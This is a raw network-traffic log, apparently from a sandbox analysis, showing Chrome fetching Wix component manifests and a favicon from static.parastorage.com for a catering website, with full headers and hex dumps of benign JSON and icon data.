                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        93192.168.2.55001934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC641OUTGET /services/editor-elements/1.13190.0/rb_dsgnsys.thunderbolt.manifest.min.json HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1156INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 4030
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: 8WHwHXzOO7A9TUXgOF7FY0vzYD4nXLuB
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 545837398 486270653
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 355524425
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 10:02:39 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 100228
                                                                                                                                                                                                                        Last-Modified: Wed, 08 Jan 2025 16:47:17 GMT
                                                                                                                                                                                                                        ETag: "0f364231c7bbbcbf4af5f7bafff7eff4"
                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC234INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 30 22 2c 22 68 6f 73 74 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 64 73 67 6e 73 79 73 22 2c 22 62 61 73 65 55 52 4c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 65 64 69 74 6f 72 2d 65 6c 65 6d 65 6e 74 73 2d 64 65 73 69 67 6e 2d 73 79 73 74 65 6d 73 2f 64 69 73 74 2f 74 68 75 6e 64 65 72 62 6f 6c 74 2f 22 2c 22 6d 6f 64 65 6c 22 3a 5b 22 36 32 61 32 34 65 36 66 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 63 38 64 36 35 39 33 61 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 61 73 73 65 74 73 22 3a 5b 5b 22 73 74 79 6c 61 62 6c
                                                                                                                                                                                                                        Data Ascii: {"version":"2.0","host":"thunderbolt","namespace":"dsgnsys","baseURL":"https://static.parastorage.com/services/editor-elements-design-systems/dist/thunderbolt/","model":["62a24e6f.bundle.min.js","c8d6593a.min.css"],"assets":[["stylabl
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 65 2d 6d 65 74 61 64 61 74 61 22 2c 22 65 64 69 74 6f 72 2d 65 6c 65 6d 65 6e 74 73 2d 64 65 73 69 67 6e 2d 73 79 73 74 65 6d 73 2e 74 68 75 6e 64 65 72 62 6f 6c 74 2e 32 36 35 30 64 34 36 39 33 36 33 62 36 63 35 34 32 30 66 36 62 64 65 36 36 62 30 61 36 38 37 31 39 33 30 65 35 33 61 62 2e 6d 65 74 61 64 61 74 61 2e 6a 73 6f 6e 22 5d 5d 2c 22 63 6f 6d 70 6f 6e 65 6e 74 73 22 3a 7b 22 43 6f 6e 74 72 6f 6c 54 79 70 65 73 22 3a 5b 22 65 31 35 35 64 34 65 66 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 65 64 35 63 37 36 63 66 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 61 73 68 62 6f 61 72 64 42 75 74 74 6f 6e 22 3a 5b 22 32 33 61 31 62 34 33 65 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 32 62 39 64 65 65 38 30 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44
                                                                                                                                                                                                                        Data Ascii: e-metadata","editor-elements-design-systems.thunderbolt.2650d469363b6c5420f6bde66b0a6871930e53ab.metadata.json"]],"components":{"ControlTypes":["e155d4ef.bundle.min.js","ed5c76cf.min.css"],"DashboardButton":["23a1b43e.bundle.min.js","2b9dee80.min.css"],"D
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 39 31 38 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 64 64 64 61 36 34 61 37 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 62 75 44 72 69 6c 6c 44 6f 77 6e 22 3a 5b 22 63 32 37 32 30 35 37 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 38 65 61 33 65 34 66 32 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 62 75 44 72 6f 70 64 6f 77 6e 22 3a 5b 22 38 65 36 37 39 65 63 38 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 33 30 31 37 62 35 36 38 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 62 75 45 6d 70 74 79 53 74 61 74 65 22 3a 5b 22 65 62 34 62 62 33 64 39 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 34 61 31 63 61 64 64 38 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 62 75 46 6f 6e 74 41 6e 64 43 6f 6c 6f 72 50 69 63 6b 65 72 22 3a 5b 22 33 35 66 65 35 37
                                                                                                                                                                                                                        Data Ascii: 9182.bundle.min.js","ddda64a7.min.css"],"WbuDrillDown":["c2720572.bundle.min.js","8ea3e4f2.min.css"],"WbuDropdown":["8e679ec8.bundle.min.js","3017b568.min.css"],"WbuEmptyState":["eb4bb3d9.bundle.min.js","4a1cadd8.min.css"],"WbuFontAndColorPicker":["35fe57
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1016INData Raw: 65 72 22 3a 5b 22 39 37 62 32 62 66 30 61 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 66 38 37 34 32 65 66 31 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 73 72 44 72 6f 70 64 6f 77 6e 22 3a 5b 22 37 39 65 39 35 34 35 64 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 61 62 33 35 30 34 34 37 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 73 72 4d 65 73 73 61 67 65 4d 6f 64 61 6c 4c 61 79 6f 75 74 22 3a 5b 22 38 34 37 65 37 33 31 64 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 38 63 37 35 30 36 34 36 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 73 72 50 61 67 65 22 3a 5b 22 36 63 33 31 35 35 30 63 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 30 30 61 30 63 66 39 32 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 73 72 50 72 65 76 69 65 77 57 69 64 67 65 74 22 3a
                                                                                                                                                                                                                        Data Ascii: er":["97b2bf0a.bundle.min.js","f8742ef1.min.css"],"WsrDropdown":["79e9545d.bundle.min.js","ab350447.min.css"],"WsrMessageModalLayout":["847e731d.bundle.min.js","8c750646.min.css"],"WsrPage":["6c31550c.bundle.min.js","00a0cf92.min.css"],"WsrPreviewWidget":


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        94192.168.2.55002434.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC364OUTGET /client/pfavico.ico HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1150
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Version-Id: 0x5C7YdGnxYK.Yjl2_U1.5aDaa7h7MJW
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Varnish: 400295744
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        X-Wix-Request-Id: 1726199455.0311244933965121287198
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 17:02:22 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 2580646
                                                                                                                                                                                                                        Last-Modified: Thu, 11 Jan 2024 08:02:26 GMT
                                                                                                                                                                                                                        ETag: "b53ce85a6cce2ae00037a6ca13c90866"
                                                                                                                                                                                                                        Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC227INData Raw: 00 00 01 00 01 00 10 10 00 00 00 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff
                                                                                                                                                                                                                        Data Ascii: h( @
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC923INData Raw: ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01
                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        95192.168.2.55002534.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC421OUTGET /services/editor-elements/1.13190.0/rb_dsgnsys.thunderbolt.manifest.min.json HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1156INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 4030
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: 8WHwHXzOO7A9TUXgOF7FY0vzYD4nXLuB
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 560973077 486270653
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 323933714
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcydaHuKmePuYLvGovietlnc/MRAhrlVRxaXdYSRy7tLb
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 10:02:39 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 100229
                                                                                                                                                                                                                        Last-Modified: Wed, 08 Jan 2025 16:47:17 GMT
                                                                                                                                                                                                                        ETag: "0f364231c7bbbcbf4af5f7bafff7eff4"
                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC234INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 30 22 2c 22 68 6f 73 74 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 64 73 67 6e 73 79 73 22 2c 22 62 61 73 65 55 52 4c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 65 64 69 74 6f 72 2d 65 6c 65 6d 65 6e 74 73 2d 64 65 73 69 67 6e 2d 73 79 73 74 65 6d 73 2f 64 69 73 74 2f 74 68 75 6e 64 65 72 62 6f 6c 74 2f 22 2c 22 6d 6f 64 65 6c 22 3a 5b 22 36 32 61 32 34 65 36 66 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 63 38 64 36 35 39 33 61 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 61 73 73 65 74 73 22 3a 5b 5b 22 73 74 79 6c 61 62 6c
                                                                                                                                                                                                                        Data Ascii: {"version":"2.0","host":"thunderbolt","namespace":"dsgnsys","baseURL":"https://static.parastorage.com/services/editor-elements-design-systems/dist/thunderbolt/","model":["62a24e6f.bundle.min.js","c8d6593a.min.css"],"assets":[["stylabl
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 65 2d 6d 65 74 61 64 61 74 61 22 2c 22 65 64 69 74 6f 72 2d 65 6c 65 6d 65 6e 74 73 2d 64 65 73 69 67 6e 2d 73 79 73 74 65 6d 73 2e 74 68 75 6e 64 65 72 62 6f 6c 74 2e 32 36 35 30 64 34 36 39 33 36 33 62 36 63 35 34 32 30 66 36 62 64 65 36 36 62 30 61 36 38 37 31 39 33 30 65 35 33 61 62 2e 6d 65 74 61 64 61 74 61 2e 6a 73 6f 6e 22 5d 5d 2c 22 63 6f 6d 70 6f 6e 65 6e 74 73 22 3a 7b 22 43 6f 6e 74 72 6f 6c 54 79 70 65 73 22 3a 5b 22 65 31 35 35 64 34 65 66 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 65 64 35 63 37 36 63 66 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 61 73 68 62 6f 61 72 64 42 75 74 74 6f 6e 22 3a 5b 22 32 33 61 31 62 34 33 65 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 32 62 39 64 65 65 38 30 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44
                                                                                                                                                                                                                        Data Ascii: e-metadata","editor-elements-design-systems.thunderbolt.2650d469363b6c5420f6bde66b0a6871930e53ab.metadata.json"]],"components":{"ControlTypes":["e155d4ef.bundle.min.js","ed5c76cf.min.css"],"DashboardButton":["23a1b43e.bundle.min.js","2b9dee80.min.css"],"D
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 39 31 38 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 64 64 64 61 36 34 61 37 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 62 75 44 72 69 6c 6c 44 6f 77 6e 22 3a 5b 22 63 32 37 32 30 35 37 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 38 65 61 33 65 34 66 32 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 62 75 44 72 6f 70 64 6f 77 6e 22 3a 5b 22 38 65 36 37 39 65 63 38 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 33 30 31 37 62 35 36 38 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 62 75 45 6d 70 74 79 53 74 61 74 65 22 3a 5b 22 65 62 34 62 62 33 64 39 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 34 61 31 63 61 64 64 38 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 62 75 46 6f 6e 74 41 6e 64 43 6f 6c 6f 72 50 69 63 6b 65 72 22 3a 5b 22 33 35 66 65 35 37
                                                                                                                                                                                                                        Data Ascii: 9182.bundle.min.js","ddda64a7.min.css"],"WbuDrillDown":["c2720572.bundle.min.js","8ea3e4f2.min.css"],"WbuDropdown":["8e679ec8.bundle.min.js","3017b568.min.css"],"WbuEmptyState":["eb4bb3d9.bundle.min.js","4a1cadd8.min.css"],"WbuFontAndColorPicker":["35fe57
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1016INData Raw: 65 72 22 3a 5b 22 39 37 62 32 62 66 30 61 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 66 38 37 34 32 65 66 31 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 73 72 44 72 6f 70 64 6f 77 6e 22 3a 5b 22 37 39 65 39 35 34 35 64 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 61 62 33 35 30 34 34 37 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 73 72 4d 65 73 73 61 67 65 4d 6f 64 61 6c 4c 61 79 6f 75 74 22 3a 5b 22 38 34 37 65 37 33 31 64 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 38 63 37 35 30 36 34 36 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 73 72 50 61 67 65 22 3a 5b 22 36 63 33 31 35 35 30 63 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 30 30 61 30 63 66 39 32 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 57 73 72 50 72 65 76 69 65 77 57 69 64 67 65 74 22 3a
                                                                                                                                                                                                                        Data Ascii: er":["97b2bf0a.bundle.min.js","f8742ef1.min.css"],"WsrDropdown":["79e9545d.bundle.min.js","ab350447.min.css"],"WsrMessageModalLayout":["847e731d.bundle.min.js","8c750646.min.css"],"WsrPage":["6c31550c.bundle.min.js","00a0cf92.min.css"],"WsrPreviewWidget":


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        96192.168.2.55002734.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC419OUTGET /services/editor-elements/1.13190.0/rb_wixui.thunderbolt.manifest.min.json HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1107INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 41390
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: WnNsjhZsOZ.0BQOcd89gEo8gaNMG6i2E
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 339869372 289211457
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 10:16:08 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 99420
                                                                                                                                                                                                                        Last-Modified: Wed, 08 Jan 2025 16:47:17 GMT
                                                                                                                                                                                                                        ETag: "e171c088607cf01fc09db32f853fca64"
                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
